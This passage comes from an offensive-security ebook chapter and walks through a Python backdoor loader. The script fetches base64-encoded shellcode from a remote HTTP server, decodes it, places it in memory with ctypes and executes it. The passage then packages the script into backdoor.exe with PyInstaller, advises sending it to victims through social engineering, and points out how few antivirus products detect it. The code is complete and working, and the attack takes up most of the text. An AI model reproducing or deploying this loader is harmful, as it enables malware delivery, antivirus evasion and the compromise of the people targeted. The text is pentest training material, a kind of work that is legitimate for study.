Writing your payload retrieval and delivery in Python

Now, let's get back to Python and write the second phase of our attack. Keep in mind, we're going to eventually end up with a Windows-specific EXE file, so this script will need to get to your Windows PyInstaller box. You could write it up on Kali and transfer it over, or just write it in Python on Windows to save a step.

Nine lines of code and a 355-byte payload are to be imported. Not too shabby, and a nice demonstration of how lightweight Python can be:

#!/usr/bin/python
from urllib.request import urlopen
import ctypes
import base64
pullhttp = urlopen("http://192.168.108.114:8000/backdoor.bin")
shellcode = base64.b64decode(pullhttp.read())
codemem_buff = ctypes.create_string_buffer(shellcode, len(shellcode))
exploit_func = ctypes.cast(codemem_buff, ctypes.CFUNCTYPE (ctypes.c_void_p))
exploit_func()

Let's examine this code step by step:

  • We have three new import statements to look at. Notice that the first statement is a from ... import, which means we're being picky about which component of the source module (or in this case, a package of modules) we're going to use. In our case, we don't need the entirety of URL handling; we're only opening a single defined URL, so we pull in urlopen.
  • The ctypes import is a foreign function library; that is, it enables function calls in shared libraries (including DLLs).
  • urlopen() accesses the defined URL (which we have set up on our end by simply executing python -m SimpleHTTPServer in the directory where our base64-encoded payload is waiting) and stores the capture as pullhttp.
  • We use base64.b64decode() and pass as an argument, pullhttp.read(), storing our raw shellcode as shellcode.
  • Now, we use some ctypes magic. ctypes is sophisticated enough for its own chapter, so I encourage further research on it; for now, we're allocating some buffer space for our payload, using len() to allocate space of the same size as our payload itself. Then, we use ctypes.cast() to cast (namely, make a type conversion) our buffer space as a function pointer. The moment we do this, we now have exploit_func(); effectively a Python function that we can call like any ordinary function. When we call it, our payload executes.
  • What else is there to do, then? We call our exploit function, exploit_func().

In my example, I typed this up in Vim and stored it as backdoor.py. I copy it over to my Windows box and execute PyInstaller, using --onefile to specify that I want a single executable:

pyinstaller --onefile backdoor.py

PyInstaller spits out backdoor.exe. Now, I just send this file as part of a social engineering campaign to encourage execution. Don't forget to set up your HTTP server so target instances of this script can grab the payload! In this screenshot, we can see backdoor.exe grabbing the payload as expected:

Finally, let's take a look at evasion using this technique. The payload itself set off no alarms during the import. Our executable itself, which is what an endpoint would see and thus, is likely to be scanned, was only detected by 6.8% of antivirus products:

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
13.58.121.214